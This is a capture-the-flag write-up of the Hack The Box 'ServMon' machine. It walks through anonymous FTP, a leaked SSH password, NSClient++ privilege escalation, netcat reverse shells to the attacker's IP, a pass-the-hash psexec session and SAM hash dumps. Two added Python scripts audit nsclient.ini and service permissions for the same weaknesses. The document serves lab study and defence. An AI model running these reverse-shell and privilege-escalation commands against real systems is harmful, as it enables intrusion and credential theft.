
htb-servmon

As always, we start with an nmap scan.


We can log in to FTP anonymously and find confidential.txt at ftp://10.10.10.184/Nathan:

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine


The LFI exploit is https://www.exploit-db.com/exploits/47774.

So we have the passwords.

L1k3B1gBut7s@W0rk is the password for user Nadine.


ssh nadine@10.10.10.184 (password: L1k3B1gBut7s@W0rk)

Next we upload nc.exe to the box.

Then we use the NSClient++ privilege escalation from https://www.exploit-db.com/exploits/46802:

C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
This is the password for the login page on port 8443.

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat --data-binary "c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe"
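The chain above only works because of a combination of NSClient++ settings: the web server is on, external scripts are allowed, and the web password sits in clear text in an nsclient.ini that a low-privileged user can read. The following is an added example (not from this writeup or from the NSClient++ project) that parses an nsclient.ini, flags that combination, and writes a copy with the script-execution surface switched off. The sample ini is constructed; the section and key names follow the NSClient++ 0.5.x default file as recalled here and are assumptions to compare against your own install.

```python
"""Flag the nsclient.ini settings that, taken together, let anyone who can
read the file run code through the NSClient++ web API (added example)."""
import configparser
import io

# Constructed sample in the NSClient++ 0.5.x layout. Section and key names
# are assumptions based on the default shipped nsclient.ini, not this box's file.
SAMPLE_INI = """
; constructed sample, not a real deployment
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = PLACEHOLDER-WEB-PASSWORD

[/settings/external scripts]
allow arguments = true
"""


def load_ini(text):
    """Parse nsclient.ini text; keys keep their case and '%' is left alone."""
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=(";", "#"))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def is_on(cp, section, key):
    """True when a module or flag is switched on (missing means off)."""
    return cp.get(section, key, fallback="").strip().lower() in ("enabled", "true", "1")


def audit_nsclient(cp):
    """Return a list of findings for a parsed nsclient.ini (empty = nothing flagged)."""
    findings = []
    web = is_on(cp, "/modules", "WEBServer")
    scripts = is_on(cp, "/modules", "CheckExternalScripts")
    scheduler = is_on(cp, "/modules", "Scheduler")
    password = cp.get("/settings/default", "password", fallback="").strip()
    hosts = [h.strip() for h in cp.get("/settings/default", "allowed hosts", fallback="").split(",")
             if h.strip()]
    if web and password:
        findings.append("web API password stored in clear text in nsclient.ini: whoever can read "
                        "the file can log in (restrict the file ACL and rotate the password)")
    if web and scripts:
        findings.append("WEBServer + CheckExternalScripts: the web API can create and run external scripts")
    if scripts and scheduler:
        findings.append("Scheduler + CheckExternalScripts: an uploaded script can be run on a timer")
    if is_on(cp, "/settings/external scripts", "allow arguments"):
        findings.append("allow arguments = true: callers can pass arguments to external scripts")
    if web and scripts and hosts and all(h in ("127.0.0.1", "::1", "localhost") for h in hosts):
        findings.append("allowed hosts is loopback-only, which does not stop a user already on the host")
    return findings


def harden(text):
    """Return a copy of the ini with external scripts and script arguments turned off.

    Assumes the deployment does not rely on external scripts; the Scheduler is
    left alone because legitimate checks use it. The clear-text password cannot
    be fixed inside the ini and still shows up as a finding afterwards."""
    cp = load_ini(text)
    for section, key, value in (("/modules", "CheckExternalScripts", "disabled"),
                                ("/settings/external scripts", "allow arguments", "false")):
        if cp.has_section(section):
            cp.set(section, key, value)
    out = io.StringIO()
    cp.write(out)
    return out.getvalue()


if __name__ == "__main__":
    for line in audit_nsclient(load_ini(SAMPLE_INI)):
        print("weak:", line)
    for line in audit_nsclient(load_ini(harden(SAMPLE_INI))):
        print("after hardening:", line)
```

Run it against the real file with `audit_nsclient(load_ini(open(path).read()))`; the remaining finding after hardening is the one that needs an ACL and a secret rotation rather than an ini edit.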

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Another way:

Enumerating the current user shows that the "Server Operators" group can read and write system services: it can change the configuration of a service that runs as SYSTEM and then start it. So the idea is to find a SYSTEM service that is not running, point its binary at a trojan or nc, and start it:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>
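The two things that make this path work are a service DACL that lets a non-admin group change the service configuration and start it, and an ImagePath that now points at a binary in a directory ordinary users can write to. The following is an added example (not from this writeup) that takes the security descriptor string `sc sdshow <service>` prints plus the service's ImagePath and reports both conditions; the right-abbreviation table is the one Windows uses for service descriptors, and the two sample descriptors are constructed (the second simply adds an ACE for the Server Operators alias `SO`), not copied from this machine.

```python
"""Audit one Windows service: who can reconfigure or start it (from its SDDL),
and whether its ImagePath looks like something a user could have planted.
Added example; descriptors below are constructed."""
import re

# Access-right abbreviations as used in service security descriptors.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "SD": "DELETE",
}
# Rights that let the holder change what the service runs, or take over its ACL.
RECONFIGURE = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}
# Well-known SDDL trustee aliases (SO is the Server Operators group).
TRUSTEES = {"SY": "SYSTEM", "BA": "Administrators", "SO": "Server Operators",
            "IU": "Interactive Users", "SU": "Service Logon Users",
            "AU": "Authenticated Users", "BU": "Users", "WD": "Everyone"}
EXPECTED_CONTROLLERS = {"SY", "BA"}
# Locations a normal user can write to; a service binary has no business there.
USER_WRITABLE = ("C:\\WINDOWS\\TEMP\\", "C:\\WINDOWS\\TASKS\\", "C:\\USERS\\", "C:\\TEMP\\")
# (type;flags;rights;object_guid;inherit_guid;sid) -> we keep type, rights, sid.
ACE_RE = re.compile(r"\((A|D);[^;]*;([^;]*);;;([^)]+)\)")
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

# Constructed samples: a typical default service DACL, and the same DACL with
# an extra ACE giving Server Operators change-config (DC) and start (RP) rights.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;SO)(A;;CCLCSWLOCRRC;;;IU)")


def parse_dacl(sddl):
    """Return [(trustee, set_of_right_names)] for the allow ACEs in the DACL."""
    dacl = sddl.split("S:", 1)[0].split("D:", 1)[1]   # drop the SACL, keep the DACL
    aces = []
    for ace_type, rights, trustee in ACE_RE.findall(dacl):
        if ace_type != "A":
            continue
        if rights in ("FA", "GA"):                       # generic full access
            names = set(SERVICE_RIGHTS.values())
        else:
            names = {SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                     for i in range(0, len(rights), 2)}
        aces.append((trustee, names))
    return aces


def split_image_path(image_path):
    """Split an ImagePath into (executable, arguments), honouring a quoted path."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    exe, _, args = s.partition(" ")
    return exe, args.strip()


def audit_service(name, sddl, image_path):
    """Return a list of findings for one service (empty means nothing flagged)."""
    findings = []
    for trustee, rights in parse_dacl(sddl):
        if trustee in EXPECTED_CONTROLLERS:
            continue
        who = TRUSTEES.get(trustee, trustee)
        bad = sorted(rights & RECONFIGURE)
        if bad:
            findings.append(f"{name}: {who} can reconfigure the service ({', '.join(bad)})")
        if "SERVICE_START" in rights:
            findings.append(f"{name}: {who} can start the service")
    exe, args = split_image_path(image_path)
    exe_norm = exe.upper().replace("%SYSTEMROOT%", "C:\\WINDOWS")
    if exe_norm.startswith(USER_WRITABLE):
        findings.append(f"{name}: binary {exe} lives in a user-writable location")
    if IPV4_RE.search(args):                              # heuristic: service args rarely carry an IP
        findings.append(f"{name}: ImagePath arguments contain an IP address ({args})")
    return findings


if __name__ == "__main__":
    print(audit_service("Dhcp", DEFAULT_SDDL, "%SystemRoot%\\system32\\svchost.exe -k netsvcs"))
    print(audit_service("SensorDataService", WEAK_SDDL,
                        "C:\\Windows\\Temp\\nc.exe 10.10.14.13 9876 -e cmd"))
```

Feeding every service's `sc sdshow` output and ImagePath through `audit_service` gives a list of services a non-admin group can repoint and start; the ImagePath checks are a cheap way to spot one that already has been.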

Author : Puckiestyle
